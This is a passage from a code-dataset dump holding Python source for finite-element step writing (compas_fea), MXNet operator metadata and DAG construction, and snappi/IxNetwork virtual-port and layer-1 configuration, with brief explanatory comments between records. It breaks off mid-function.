interaction.emissivity\n\n# # Initial T\n\n# f.write('*INITIAL CONDITIONS, TYPE=TEMPERATURE\\n')\n# f.write('NSET_ALL, {0}\\n'.format(temp0))\n# f.write('**\\n')\n\n# # Interface\n\n# f.write('*STEP, NAME={0}, INC={1}\\n'.format(sname, increments))\n# f.write('*{0}, END=PERIOD, DELTMX={1}\\n'.format(method, deltmx))\n# f.write('1, {0}, 5.4e-05, {0}\\n'.format(duration))\n# f.write('**\\n')\n# f.write('*SFILM, AMPLITUDE={0}\\n'.format(amplitude))\n# f.write('{0}, F, {1}, {2}\\n'.format(interface, sink_t, film_c))\n# f.write('**\\n')\n# f.write('*SRADIATE, AMPLITUDE={0}\\n'.format(amplitude))\n# f.write('{0}, R, {1}, {2}\\n'.format(interface, ambient_t, emissivity))\n\n# # fieldOutputs\n\n# f.write('**\\n')\n# f.write('** OUTPUT\\n')\n# f.write('** ------\\n')\n# f.write('*OUTPUT, FIELD\\n')\n# f.write('**\\n')\n# f.write('*NODE OUTPUT\\n')\n# f.write('NT\\n')\n# f.write('**\\n')\n# f.write('*END STEP\\n')\n","sub_path":"src/compas_fea/fea/write_steps.py","file_name":"write_steps.py","file_ext":"py","file_size_in_byte":31474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
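The compas_fea record above generates solver input decks for abaqus, opensees, sofistik and ansys by threading a `software` key through small lookup tables (comments, middle, headers, footers) and per-load helper functions, rather than branching at every write. A stripped-down sketch of that dispatch pattern (illustrative only, not part of compas_fea):

import io

comments = {'abaqus': '**', 'opensees': '#', 'sofistik': '$', 'ansys': '!'}

def write_titled_block(f, software, title, lines):
    c = comments[software]  # per-backend comment marker, as in the module above
    f.write('{0} {1}\n'.format(c, title))
    f.write('{0} '.format(c) + '-' * len(title) + '\n')
    for line in lines:
        f.write(line + '\n')

f = io.StringIO()
write_titled_block(f, 'opensees', 'step_1', ['analysis Static', 'analyze 100'])
print(f.getvalue())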
+{"seq_id":"366321517","text":"import json\nimport numpy as np\nimport os, sys\nimport networkx as nx\n\nclass MetaInfo:\n def __init__(self, meta_dir):\n self.meta_dir = meta_dir\n with open(os.path.join(meta_dir, \"metadata.json\"), \"r\") as fp:\n self.mx_meta = json.load(fp)\n\n self.cache_meta = {}\n self.cache_raw_meta = {}\n\n ### dependency graph of this model\n self.dag = self.gen_dag()\n\n all_output = self.mx_meta[\"outputs\"]\n all_shape = self.mx_meta[\"out_shapes\"]\n assert len(all_output) == len(all_shape)\n\n ### init name2shape dict, convert name to std. name\n self.name2shape = {}\n for idx, out_ in enumerate(all_output):\n if \"data\" in out_:\n self.name2shape[out_.replace(\"data\", \"I/O_\")] = all_shape[idx]\n elif \"_output\" in out_:\n ### activations\n raw_name = out_.split(\"_output\")[0]\n self.name2shape[\"FW.\" + (raw_name.split(\"_fwd\")[0] if \"_fwd\" in raw_name else raw_name)] = all_shape[idx]\n else:\n ### weights or variables\n self.name2shape[\"Comm.\" + out_] = all_shape[idx]\n\n def ret_mx_metadata(self, node, batch_size=None):\n '''\n node: node name in the dag\n '''\n if node not in self.name2shape:\n raise KeyError(\"shape info for {} is not in the meta data\".format(node))\n if \"FW\" not in node:\n ### only consider FW node\n return\n if node in self.cache_meta:\n op_type, S_mul, S_add, S_in, S_out, S_wei = self.cache_meta[node]\n if batch_size is not None:\n ratio = batch_size / self.cache_raw_meta[node][8]\n else:\n ratio = 1\n return op_type, S_mul * ratio, S_add * ratio, S_in * ratio, S_out * ratio, S_wei\n\n op_type = self.parse_op_type(node)\n if op_type == \"conv\":\n ### outputs\n output_shape = self.name2shape[node]\n assert len(output_shape) == 4, (node, output_shape)\n N = output_shape[0]\n ### TODO (huhanpeng): assume the width=height, the same for input shape\n P = Q = output_shape[2]\n ### different layout, NHWC --> shape[3] or NCHW --> shape[1]\n K = output_shape[3] if output_shape[1] == P else output_shape[1]\n\n ### inputs\n prevs = self.dag.in_edges(node)\n assert len(prevs) == 1, (node, prevs)\n prev_, _ = list(prevs)[0]\n input_shape = self.name2shape[prev_]\n assert input_shape[0] == N, (node, input_shape, output_shape)\n H = W = input_shape[2]\n C = input_shape[3] if input_shape[1] == H else input_shape[1]\n\n ### weights\n bp_node = \"BW.\".join(node.split(\"FW.\"))\n wei_node = bias_node = None\n for succ_ in self.dag.successors(bp_node):\n if \"Comm.\" in succ_:\n if \"wei\" in succ_:\n wei_node = succ_\n elif \"bias\" in succ_:\n bias_node = succ_\n else:\n raise ValueError(\"Conv2D node {} has undefined parameter {}\".format(node, succ_))\n if wei_node is None:\n raise ValueError(\"No variable/weights for {}\".format(node))\n wei_shape = self.name2shape[wei_node]\n # TODO (huhanpeng): still assume the kernel is a square\n if wei_shape[2] == wei_shape[3]:\n R = S = wei_shape[2]\n else:\n R = S = wei_shape[0]\n\n if batch_size is None:\n batch_size = N\n self.cache_meta[node] = op_type, batch_size*K*P*Q*C*R*S, batch_size*K*P*Q*(C*R*S-1), batch_size*H*W*C, batch_size*P*Q*K, R*S*C*K\n self.cache_raw_meta[node] = [H, W, C, R, S, P, Q, K, batch_size, 0 if bias_node is None else 1]\n return self.cache_meta[node]\n elif op_type == \"dense\":\n ### nexts\n output_shape = self.name2shape[node]\n assert len(output_shape) == 2, (node, output_shape)\n B = output_shape[0]\n C_out = output_shape[1]\n\n ### prevs\n prevs = self.dag.in_edges(node)\n assert len(prevs) == 1, prevs\n prev_, _ = list(prevs)[0]\n input_shape = 
self.name2shape[prev_]\n assert input_shape[0] == B, (node, input_shape, output_shape)\n C_in = input_shape[1]\n\n ### weights\n ### No need to read weights\n if batch_size is None:\n batch_size = B\n self.cache_meta[node] = (op_type, batch_size*C_in*C_out, batch_size*(C_in-1)*C_out, batch_size*C_in, batch_size*C_out, C_in*C_out)\n self.cache_raw_meta[node] = [C_in, C_out]\n return self.cache_meta[node]\n elif op_type == \"cast\":\n ### nexts\n output_shape = self.name2shape[node]\n\n ### prevs\n prevs = self.dag.in_edges(node)\n assert len(prevs) == 1, prevs\n prev_, _ = list(prevs)[0]\n input_shape = self.name2shape[prev_]\n ### NOTE: the original called undefined names (inputs, outputs, self.dtype2size);\n ### report element counts from the shapes resolved above instead\n self.cache_meta[node] = (op_type, 0, 0, np.prod(input_shape), np.prod(output_shape), 0)\n return self.cache_meta[node]\n elif op_type == \"embedding\":\n output_shape = self.name2shape[node]\n output_size = np.prod(output_shape)\n if len(output_shape) == 2:\n ### no batch size\n B = None\n elif len(output_shape) == 3:\n B = output_shape[0]\n if batch_size is not None:\n output_size = output_size * batch_size / B\n else:\n raise ValueError(\"Unexpected embedding output shape {}\".format(output_shape))\n\n ### prevs\n prevs = self.dag.in_edges(node)\n assert len(prevs) == 1, prevs\n prev_, _ = list(prevs)[0]\n input_shape = self.name2shape[prev_]\n input_size = np.prod(input_shape)\n if B is not None and batch_size is not None:\n input_size = input_size * batch_size / B\n\n bp_node = \"BW.\".join(node.split(\"FW.\"))\n comm_node = []\n for succ_ in self.dag.successors(bp_node):\n if \"Comm.\" in succ_:\n comm_node.append(succ_)\n if len(comm_node) == 0:\n raise ValueError(\"No variable/weights for {}\".format(node))\n wei_shape = [self.name2shape[e] for e in comm_node][0]\n wei_size = np.prod(wei_shape)\n\n # print(input_shape, output_shape, wei_shape)\n\n self.cache_meta[node] = (op_type, input_size*wei_size, 0, input_size, output_size, wei_size)\n return self.cache_meta[node]\n else:\n raise NotImplementedError(\"Metadata for {} is not implemented yet.\".format(node))\n\n def ret_mx_rawmeta(self, node, batch_size):\n if node not in self.cache_raw_meta:\n self.ret_mx_metadata(node, batch_size)\n if node not in self.cache_raw_meta:\n raise ValueError(node)\n return self.cache_raw_meta[node]\n\n def parse_op_type(self, op_name):\n op_name = op_name.lower()\n if \"conv\" in op_name:\n return \"conv\"\n elif \"dense\" in op_name:\n return \"dense\"\n elif \"cast\" in op_name:\n return \"cast\"\n elif \"embedding\" in op_name:\n return \"embedding\"\n else:\n raise ValueError(\"Undefined op type for {}\".format(op_name))\n\n def gen_dag(self, _main=False):\n \"\"\"Construct a DAG from the MXNet symbol debug string\n\n Parameters:\n ----------\n _main : bool\n If True, BW nodes connect directly to a global UPDATE node;\n otherwise gradients are routed through per-variable Comm.* nodes.\n \"\"\"\n with open(os.path.join(self.meta_dir, \"symbol_debug_str.txt\"), \"r\") as fp:\n s = fp.read()\n _dag = nx.DiGraph()\n blocks = s.split(\"--------------------\\n\")\n \n #! 3. FW -> OUTPUT and 4. 
OUTPUT -> BW\n first_ls = blocks[0].split('\\n')\n output_cnt = 0\n for i in range(len(first_ls)):\n if \"Variable:\" in first_ls[i]:\n break\n if \"output[\" in first_ls[i]:\n output_node = first_ls[i].split(']=')[1].split('(')[0]\n output_node = output_node.split(\"_fwd\")[0] if \"_fwd\" in output_node else output_node\n _dag.add_edge(\"FW.\" + output_node, \"OUTPUT%d\"%output_cnt)\n _dag.add_edge(\"OUTPUT%d\"%output_cnt, \"BW.\" + output_node)\n output_cnt += 1\n\n for i in range(1, len(blocks)):\n prev_block = blocks[i-1]\n var = []\n prev_ls = prev_block.split('\\n')\n for l in prev_ls:\n if \"Variable\" in l:\n var.append(l.split('Variable:')[1])\n block = blocks[i]\n ls = block.split('\\n')\n if 'Name' not in ls[0]:\n continue\n name = ls[0].split('Name=')[1]\n op = ls[0].split(',')[0].split(\"Op:\")[1]\n args = []\n for l in ls:\n if \"arg[\" in l:\n arg_name = l.split(']=')[1].split('(')[0]\n if arg_name not in var:\n args.append(arg_name)\n if \"_fwd\" in name:\n name = name.split(\"_fwd\")[0]\n\n #! --------- construct the graph ----\n _dag.add_node(\"FW.\" + name, op=op)\n _dag.add_node(\"BW.\" + name, op=op)\n for innode in args:\n innode = innode.split(\"_fwd\")[0] if \"_fwd\" in innode else innode\n #! 2. FW -> FW and 5. BW -> BW\n _dag.add_edge(\"FW.\" + innode, \"FW.\" + name)\n _dag.add_edge(\"BW.\" + name, \"BW.\" + innode)\n for _var in var:\n if \"data\" in _var:\n _dag.add_edge(_var.replace(\"data\", \"I/O_\"), \"FW.\" + name)\n if _main:\n #! 1. IO -> FW, 8. BW -> UPDATE -> FW \n _dag.add_edge(\"BW.\" + name, \"UPDATE\")\n _dag.add_edge(\"UPDATE\", \"FW.\" + name)\n else:\n #! 7. Comm -> FW and 6. BW -> Comm\n _dag.add_edge(\"Comm.\" + _var, \"UPDATE\")\n _dag.add_edge(\"BW.\" + name, \"Comm.\" + _var)\n return _dag\n ","sub_path":"ml_platform/mxnet/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":10514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
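The MetaInfo record above derives per-operator cost terms purely from tensor shapes; for a Conv2D with input N x H x W x C, kernel R x S x C x K and output N x P x Q x K it caches S_mul = N*K*P*Q*C*R*S multiplies and S_add = N*K*P*Q*(C*R*S - 1) adds. A small worked sketch of those formulas, standalone and independent of the class:

def conv2d_cost(N, H, W, C, R, S, P, Q, K):
    # Returns (S_mul, S_add, S_in, S_out, S_wei), the terms cached by
    # ret_mx_metadata for a conv node in the record above.
    S_mul = N * K * P * Q * C * R * S
    S_add = N * K * P * Q * (C * R * S - 1)
    return S_mul, S_add, N * H * W * C, N * P * Q * K, R * S * C * K

# e.g. a 3x3 convolution, 64 -> 64 channels, 56x56 output, batch 32:
print(conv2d_cost(32, 56, 56, 64, 3, 3, 56, 56, 64))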
+{"seq_id":"235594592","text":"import json\nimport time\nimport re\nfrom snappi_ixnetwork.timer import Timer\nfrom snappi_ixnetwork.logger import get_ixnet_logger\n\n\nclass Vport(object):\n \"\"\"Transforms OpenAPI objects into IxNetwork objects\n\n Args\n ----\n - ixnetworkapi (Api): instance of the Api class\n\n Transformations\n ---------------\n - /components/schemas/Port to /vport\n - /components/schemas/Layer1 to /vport/l1Config/...\n\n Process\n -------\n - Remove any vports that are not in the config.ports\n - Add any vports that are in the config.ports\n - If the location of the config.ports.location is different than the\n the /vport -connectedTo property set it to None\n - If the config.ports.location is None don't connect the ports\n else connect the port, get the vport type, set the card mode based on the\n config.layer1.speed\n\n Notes\n -----\n - Uses resourcemanager to set the vport location and l1Config as it is the\n most efficient way. DO NOT use the AssignPorts API as it is too slow.\n - Only setup l1Config if location is connected.\n - Given a connected location and speed the vport -type, card resource mode\n and l1Config sub node are derived.\n\n \"\"\"\n\n _SPEED_MAP = {\n \"speed_400_gbps\": \"speed400g\",\n \"speed_200_gbps\": \"speed200g\",\n \"speed_100_gbps\": \"speed100g\",\n \"speed_50_gbps\": \"speed50g\",\n \"speed_40_gbps\": \"speed40g\",\n \"speed_25_gbps\": \"speed25g\",\n \"speed_10_gbps\": \"speed10g\",\n \"speed_1_gbps\": \"speed1000\",\n \"speed_100_fd_mbps\": \"speed100fd\",\n \"speed_100_hd_mbps\": \"speed100hd\",\n \"speed_10_fd_mbps\": \"speed10fd\",\n \"speed_10_hd_mbps\": \"speed10hd\",\n }\n _VM_SPEED_MAP = {\n \"speed_400_gbps\": \"speed400g\",\n \"speed_200_gbps\": \"speed200g\",\n \"speed_100_gbps\": \"speed100g\",\n \"speed_90_gbps\": \"speed90g\",\n \"speed_80_gbps\": \"speed80g\",\n \"speed_70_gbps\": \"speed70g\",\n \"speed_60_gbps\": \"speed60g\",\n \"speed_50_gbps\": \"speed50g\",\n \"speed_40_gbps\": \"speed40g\",\n \"speed_30_gbps\": \"speed30g\",\n \"speed_25_gbps\": \"speed25g\",\n \"speed_20_gbps\": \"speed20g\",\n \"speed_10_gbps\": \"speed10g\",\n \"speed_9_gbps\": \"speed9000\",\n \"speed_8_gbps\": \"speed8000\",\n \"speed_7_gbps\": \"speed7000\",\n \"speed_6_gbps\": \"speed6000\",\n \"speed_5_gbps\": \"speed5000\",\n \"speed_4_gbps\": \"speed4000\",\n \"speed_3_gbps\": \"speed3000\",\n \"speed_2_gbps\": \"speed2000\",\n \"speed_1_gbps\": \"speed1000\",\n \"speed_100_mbps\": \"speed100\",\n \"speed_100_fd_mbps\": \"speed100\",\n \"speed_100_hd_mbps\": \"speed100\",\n \"speed_10_fd_mbps\": \"speed100\",\n \"speed_10_hd_mbps\": \"speed100\",\n }\n\n _SPEED_MODE_MAP = {\n \"speed_1_gbps\": \"normal\",\n \"speed_10_gbps\": \"tengig\",\n \"speed_25_gbps\": \"twentyfivegig\",\n \"speed_40_gbps\": \"fortygig\",\n \"speed_50_gbps\": \"fiftygig\",\n \"speed_100_gbps\": \"^(?!.*(twohundredgig|fourhundredgig)).*hundredgig.*$\",\n \"speed_200_gbps\": \"twohundredgig\",\n \"speed_400_gbps\": \"fourhundredgig\",\n }\n\n _ADVERTISE_MAP = {\n \"advertise_one_thousand_mbps\": \"speed1000\",\n \"advertise_one_hundred_fd_mbps\": \"speed100fd\",\n \"advertise_one_hundred_hd_mbps\": \"speed100hd\",\n \"advertise_ten_fd_mbps\": \"speed10fd\",\n \"advertise_ten_hd_mbps\": \"speed10hd\",\n }\n _FLOW_CONTROL_MAP = {\n \"ieee_802_1qbb\": \"ieee802.1Qbb\",\n \"ieee_802_3x\": \"ieee802.3x\",\n }\n\n _RESULT_COLUMNS = [\n (\"frames_tx\", \"Frames Tx.\", int),\n (\"frames_rx\", \"Valid Frames Rx.\", int),\n (\"frames_tx_rate\", \"Frames Tx. 
Rate\", float),\n (\"frames_rx_rate\", \"Valid Frames Rx. Rate\", float),\n (\"bytes_tx\", \"Bytes Tx.\", int),\n (\"bytes_rx\", \"Bytes Rx.\", int),\n (\"bytes_tx_rate\", \"Bytes Tx. Rate\", float),\n (\"bytes_rx_rate\", \"Bytes Rx. Rate\", float),\n # ('pfc_class_0_frames_rx', 'Rx Pause Priority Group 0 Frames', int),\n # ('pfc_class_1_frames_rx', 'Rx Pause Priority Group 1 Frames', int),\n # ('pfc_class_2_frames_rx', 'Rx Pause Priority Group 2 Frames', int),\n # ('pfc_class_3_frames_rx', 'Rx Pause Priority Group 3 Frames', int),\n # ('pfc_class_4_frames_rx', 'Rx Pause Priority Group 4 Frames', int),\n # ('pfc_class_5_frames_rx', 'Rx Pause Priority Group 5 Frames', int),\n # ('pfc_class_6_frames_rx', 'Rx Pause Priority Group 6 Frames', int),\n # ('pfc_class_7_frames_rx', 'Rx Pause Priority Group 7 Frames', int),\n ]\n\n def __init__(self, ixnetworkapi):\n self._api = ixnetworkapi\n self._layer1_check = []\n self._interval = 1\n self._timeout = 10\n self.logger = get_ixnet_logger(__name__)\n\n def config(self):\n \"\"\"Transform config.ports into Ixnetwork.Vport\n 1) delete any vport that is not part of the config\n 2) create a vport for every config.ports[] not present in IxNetwork\n 3) set config.ports[].location to /vport -location or -connectedTo\n 4) set /vport/l1Config/... properties using the corrected /vport -type\n 5) connectPorts to use new l1Config settings and clearownership\n \"\"\"\n self.logger.debug(\"Configuring Vports\")\n self._resource_manager = self._api._ixnetwork.ResourceManager\n self._ixn_vport = self._api._vport\n self._layer1_check = []\n self._api._ixnetwork.StopAllProtocols(arg1=\"sync\")\n self._wait_for(lambda: self.is_protocols_stopped(),\n \"\"\"\"Protocols are not stopped in {} seconds\"\"\".format(\n self._interval * self._timeout),\n self._interval,\n self._timeout)\n with Timer(self._api, \"Ports configuration\"):\n self._delete_vports()\n self._create_vports()\n with Timer(self._api, \"Captures configuration\"):\n self._api.capture.config()\n with Timer(self._api, \"Location configuration\"):\n self._set_location()\n with Timer(self._api, \"Layer1 configuration\"):\n self._set_layer1()\n\n def _wait_for(self, func, exp_msg, interval, timeout):\n end_time = round(time.time()) + timeout\n while True:\n res = func()\n if round(time.time()) >= end_time:\n raise Exception(exp_msg)\n if res:\n return res\n time.sleep(interval)\n\n def is_protocols_stopped(self):\n topos = self._api._ixnetwork.Topology.find()\n stopped = True\n if len(topos) > 0:\n dgs = topos.DeviceGroup.find()\n if len(dgs) > 0:\n eth_list = dgs.Ethernet.find()\n if len(eth_list) > 0:\n if len(eth_list.Ipv4.find()) > 0:\n if any('up' in status or 'down' in status\n for status in\n dgs.Ethernet.find().SessionStatus):\n stopped = False\n\n return stopped\n\n def set_link_state(self, link_state):\n self.logger.debug(\"Vport setting link state\")\n with Timer(self._api, \"Link State operation\"):\n payload = {\n \"arg1\": [],\n \"arg2\": link_state.state,\n }\n for port_name in link_state.port_names:\n payload[\"arg1\"].append(\n self._api.ixn_objects.get_href(port_name)\n )\n url = \"%s/vport/operations/linkupdn\" % self._api._ixnetwork.href\n self._api._request(\"POST\", url, payload)\n\n def _import(self, imports):\n self.logger.debug(\"Importing vport configs\")\n if len(imports) > 0:\n errata = self._resource_manager.ImportConfig(\n json.dumps(imports), False\n )\n for item in errata:\n self._api.warning(item)\n return len(errata) == 0\n return True\n\n def _delete_vports(self):\n 
\"\"\"Delete any vports from the api server that do not exist in the new config\"\"\"\n self.logger.debug(\"Deleting vports\")\n self._api._remove(self._ixn_vport, self._api.snappi_config.ports)\n\n def _create_vports(self):\n \"\"\"Add any vports to the api server that do not already exist\"\"\"\n self.logger.debug(\"Creating vports\")\n vports = self._api.select_vports()\n imports = []\n for port in self._api.snappi_config.ports:\n if port.name not in vports.keys():\n index = len(vports) + len(imports) + 1\n vport_import = {\n \"xpath\": \"/vport[%i]\" % index,\n \"name\": port.name,\n \"rxMode\": \"captureAndMeasure\",\n \"txMode\": \"interleaved\",\n }\n location = port.get(\"location\")\n if location is None:\n vport_import[\"connectedTo\"] = location\n port.location = None\n imports.append(vport_import)\n self._import(imports)\n for name, vport in self._api.select_vports().items():\n self._api.ixn_objects.set(name, vport)\n\n def _add_hosts(self, HostReadyTimeout):\n self.logger.debug(\"Adding hosts in vport\")\n chassis = self._api._ixnetwork.AvailableHardware.Chassis\n add_addresses = []\n check_addresses = []\n for port in self._api.snappi_config.ports:\n location = port.get(\"location\")\n if location is not None:\n location_info = self._api.parse_location_info(location)\n chassis_address = location_info.chassis_info\n chassis.find(Hostname=\"^%s$\" % chassis_address)\n if len(chassis) == 0:\n add_addresses.append(chassis_address)\n check_addresses.append(chassis_address)\n add_addresses = set(add_addresses)\n check_addresses = set(check_addresses)\n if len(add_addresses) > 0:\n with Timer(\n self._api, \"Add location hosts [%s]\" % \", \".join(add_addresses)\n ):\n for add_address in add_addresses:\n chassis.add(Hostname=add_address)\n if len(check_addresses) > 0:\n with Timer(\n self._api,\n \"Location hosts ready [%s]\" % \", \".join(check_addresses),\n ):\n start_time = time.time()\n while True:\n chassis.find(\n Hostname=\"^(%s)$\" % \"|\".join(check_addresses),\n State=\"^ready$\",\n )\n if len(chassis) == len(check_addresses):\n break\n if time.time() - start_time > HostReadyTimeout:\n raise RuntimeError(\n \"After %s seconds, not all location hosts [%s] are reachable\"\n % (HostReadyTimeout, \", \".join(check_addresses))\n )\n time.sleep(2)\n\n def _set_location(self):\n location_supported = True\n try:\n self._api._ixnetwork._connection._options(\n self._api._ixnetwork.href + \"/locations\"\n )\n except Exception:\n location_supported = False\n\n self._add_hosts(60)\n with Timer(self._api, \"Aggregation mode speed change\"):\n layer1_check = self._api.resource_group.set_group()\n self._layer1_check.extend(layer1_check)\n vports = self._api.select_vports()\n locations = []\n imports = []\n clear_locations = []\n for port in self._api.snappi_config.ports:\n vport = vports[port.name]\n location = port.get(\"location\")\n\n if location_supported is True:\n if vport[\"location\"] == location and vport[\n \"connectionState\"\n ].startswith(\"connectedLink\"):\n continue\n else:\n if len(vport[\"connectedTo\"]) > 0 and vport[\n \"connectionState\"\n ].startswith(\"connectedLink\"):\n continue\n\n self._api.ixn_objects.set(port.name, vport)\n vport = {\"xpath\": vports[port.name][\"xpath\"]}\n if location_supported is True:\n vport[\"location\"] = location\n else:\n if location is not None:\n xpath = self._api.select_chassis_card_port(location)\n vport[\"connectedTo\"] = xpath\n else:\n vport[\"connectedTo\"] = \"\"\n imports.append(vport)\n if location is not None and 
len(location) > 0:\n clear_locations.append(location)\n locations.append(port.name)\n if len(locations) == 0:\n return\n self._clear_ownership(clear_locations)\n with Timer(self._api, \"Location connect [%s]\" % \", \".join(locations)):\n self._import(imports)\n with Timer(\n self._api, \"Location state check [%s]\" % \", \".join(locations)\n ):\n self._api._vport.find(ConnectionState=\"^(?!connectedLink).*$\")\n if len(self._api._vport) > 0:\n self._api._vport.ConnectPorts()\n start = time.time()\n timeout = 10\n while True:\n self._api._vport.find(\n Name=\"^(%s)$\"\n % \"|\".join(self._api.special_char(locations)),\n ConnectionState=\"^connectedLink\",\n )\n if len(self._api._vport) == len(locations):\n break\n if time.time() - start > timeout:\n unreachable = []\n self._api._vport.find(\n ConnectionState=\"^(?!connectedLink).*$\"\n )\n for vport in self._api._vport:\n unreachable.append(\n \"%s [%s: %s]\"\n % (\n vport.Name,\n vport.ConnectionState,\n vport.ConnectionStatus,\n )\n )\n raise RuntimeError(\n \"After %s seconds, %s are unreachable\"\n % (timeout, \", \".join(unreachable))\n )\n time.sleep(2)\n for vport in self._api._vport.find(\n ConnectionState=\"^(?!connectedLinkUp).*$\"\n ):\n self._api.warning(\n \"%s %s\" % (vport.Name, vport.ConnectionState)\n )\n\n def _set_layer1(self):\n \"\"\"Set the /vport/l1Config/... properties\n This should only happen if the vport connectionState is connectedLink...\n as it determines the ./l1Config child node.\n \"\"\"\n layer1_config = self._api.snappi_config.get(\"layer1\")\n if layer1_config is None:\n return\n if len(layer1_config) == 0:\n return\n reset_auto_negotiation = dict()\n # set and commit the card resource mode\n vports = self._api.select_vports()\n imports = []\n for layer1 in layer1_config:\n for port_name in layer1.port_names:\n self._set_card_resource_mode(\n vports[port_name], layer1, imports\n )\n if self._import(imports) is False:\n # WARNING: this retry is because no reasonable answer as to why\n # changing card mode periodically fails with this opaque message\n # 'Releasing ownership on ports failed.'\n self._api.info(\"Retrying card resource mode change\")\n self._import(imports)\n # set the vport type\n imports = []\n for layer1 in layer1_config:\n for port_name in layer1.port_names:\n self._set_vport_type(vports[port_name], layer1, imports)\n self._import(imports)\n vports = self._api.select_vports()\n # set the remainder of l1config properties\n imports = []\n for layer1 in layer1_config:\n for port_name in layer1.port_names:\n self._set_l1config_properties(\n vports[port_name], layer1, imports\n )\n self._import(imports)\n # Due to dependency attribute (ieeeL1Defaults)\n # reset enableAutoNegotiation\n imports = []\n for layer1 in layer1_config:\n for port_name in layer1.port_names:\n vport = vports[port_name]\n if (\n port_name in reset_auto_negotiation\n and reset_auto_negotiation[port_name]\n ):\n self._reset_auto_negotiation(vport, layer1, imports)\n self._import(imports)\n\n def _set_l1config_properties(self, vport, layer1, imports):\n \"\"\"Set vport l1config properties\"\"\"\n if vport[\"connectionState\"] not in [\n \"connectedLinkUp\",\n \"connectedLinkDown\",\n ]:\n return\n self._set_fcoe(vport, layer1, imports)\n self._import(imports)\n\n self._set_auto_negotiation(vport, layer1, imports)\n\n def _set_card_resource_mode(self, vport, layer1, imports):\n \"\"\"If the card has an aggregation mode set it according to the speed\"\"\"\n if (\n vport[\"connectionState\"]\n not in [\"connectedLinkUp\", 
\"connectedLinkDown\"]\n or layer1.name in self._layer1_check\n ):\n return\n\n aggregation_mode = None\n if layer1.speed in Vport._SPEED_MODE_MAP:\n card = self._api.select_chassis_card(vport)\n mode = Vport._SPEED_MODE_MAP[layer1.speed]\n for available_mode in card[\"availableModes\"]:\n if re.search(mode, available_mode.lower()) is not None:\n aggregation_mode = available_mode\n break\n if (\n aggregation_mode is not None\n and aggregation_mode != card[\"aggregationMode\"]\n ):\n self._api.info(\n \"Setting %s to resource mode %s\"\n % (card[\"description\"], aggregation_mode)\n )\n imports.append(\n {\"xpath\": card[\"xpath\"], \"aggregationMode\": aggregation_mode}\n )\n\n def _set_auto_negotiation(self, vport, layer1, imports):\n if layer1.speed.endswith(\"_mbps\") or layer1.speed == \"speed_1_gbps\":\n self._set_ethernet_auto_negotiation(vport, layer1, imports)\n else:\n self._set_gigabit_auto_negotiation(vport, layer1, imports)\n\n def _set_vport_type(self, vport, layer1, imports):\n \"\"\"Set the /vport -type\n\n If flow_control is not None then the -type attribute should\n be switched to a type with the Fcoe extension if it is allowed.\n\n If flow_control is None then the -type attribute should\n be switched to a type without the Fcoe extension.\n \"\"\"\n fcoe = False\n flow_control = layer1.get(\"flow_control\")\n if flow_control is not None:\n fcoe = True\n vport_type = vport[\"type\"]\n elegible_fcoe_vport_types = [\n \"ethernet\",\n \"tenGigLan\",\n \"fortyGigLan\",\n \"tenGigWan\",\n \"hundredGigLan\",\n \"tenFortyHundredGigLan\",\n \"novusHundredGigLan\",\n \"novusTenGigLan\",\n \"krakenFourHundredGigLan\",\n \"aresOneFourHundredGigLan\",\n \"starFourHundredGigLan\",\n ]\n if fcoe is True and vport_type in elegible_fcoe_vport_types:\n vport_type = vport_type + \"Fcoe\"\n if fcoe is False and vport_type.endswith(\"Fcoe\"):\n vport_type = vport_type.replace(\"Fcoe\", \"\")\n if vport_type != vport[\"type\"]:\n imports.append(\n {\n \"xpath\": vport[\"xpath\"] + \"/l1Config\",\n \"currentType\": vport_type,\n }\n )\n return vport_type\n\n def _set_ethernet_auto_negotiation(self, vport, layer1, imports):\n advertise = []\n if layer1.speed == \"speed_1_gbps\":\n advertise.append(\n Vport._ADVERTISE_MAP[\"advertise_one_thousand_mbps\"]\n )\n if layer1.speed == \"speed_100_fd_mbps\":\n advertise.append(\n Vport._ADVERTISE_MAP[\"advertise_one_hundred_fd_mbps\"]\n )\n if layer1.speed == \"speed_100_hd_mbps\":\n advertise.append(\n Vport._ADVERTISE_MAP[\"advertise_one_hundred_hd_mbps\"]\n )\n if layer1.speed == \"speed_10_fd_mbps\":\n advertise.append(Vport._ADVERTISE_MAP[\"advertise_ten_fd_mbps\"])\n if layer1.speed == \"speed_10_hd_mbps\":\n advertise.append(Vport._ADVERTISE_MAP[\"advertise_ten_hd_mbps\"])\n proposed_import = {\n \"xpath\": vport[\"xpath\"]\n + \"/l1Config/\"\n + vport[\"type\"].replace(\"Fcoe\", \"\"),\n \"speed\": self._get_speed(vport, layer1),\n \"media\": layer1.get(\"media\", with_default=True),\n \"autoNegotiate\": layer1.get(\"auto_negotiate\", with_default=True),\n \"speedAuto\": advertise,\n }\n self._add_l1config_import(vport, proposed_import, imports)\n\n def _add_l1config_import(self, vport, proposed_import, imports):\n type = vport[\"type\"].replace(\"Fcoe\", \"\")\n l1config = vport[\"l1Config\"][type]\n key_to_remove = []\n for key in proposed_import:\n if key == \"xpath\":\n continue\n if key not in l1config or l1config[key] == proposed_import[key]:\n key_to_remove.append(key)\n # add this constrain due to handle some specific use case (1G to 
10G)\n if \"speed\" in key_to_remove and \"speedAuto\" not in key_to_remove:\n key_to_remove.remove(\"speed\")\n for key in key_to_remove:\n proposed_import.pop(key)\n if len(proposed_import) > 0:\n imports.append(proposed_import)\n\n def _set_gigabit_auto_negotiation(self, vport, layer1, imports):\n advertise = []\n advertise.append(\n Vport._SPEED_MAP[layer1.get(\"speed\", with_default=True)]\n )\n auto_field_name = \"enableAutoNegotiation\"\n if re.search(\"novustengiglan\", vport[\"type\"].lower()) is not None:\n auto_field_name = \"autoNegotiate\"\n # Due to ieeeL1Defaults dependency\n ieee_l1_defaults = layer1.get(\"ieee_media_defaults\", with_default=True)\n if ieee_l1_defaults is None:\n ieee_l1_defaults = \"True\"\n ieee_media_defaults = {\n \"xpath\": vport[\"xpath\"]\n + \"/l1Config/\"\n + vport[\"type\"].replace(\"Fcoe\", \"\"),\n \"ieeeL1Defaults\": ieee_l1_defaults,\n }\n self._add_l1config_import(vport, ieee_media_defaults, imports)\n auto_negotiation = layer1.get(\"auto_negotiation\", with_default=True)\n rs_fec = auto_negotiation.get(\"rs_fec\", with_default=True)\n link_training = auto_negotiation.get(\n \"link_training\", with_default=True\n )\n auto_negotiate = layer1.get(\"auto_negotiate\", with_default=True)\n if auto_negotiate is None:\n 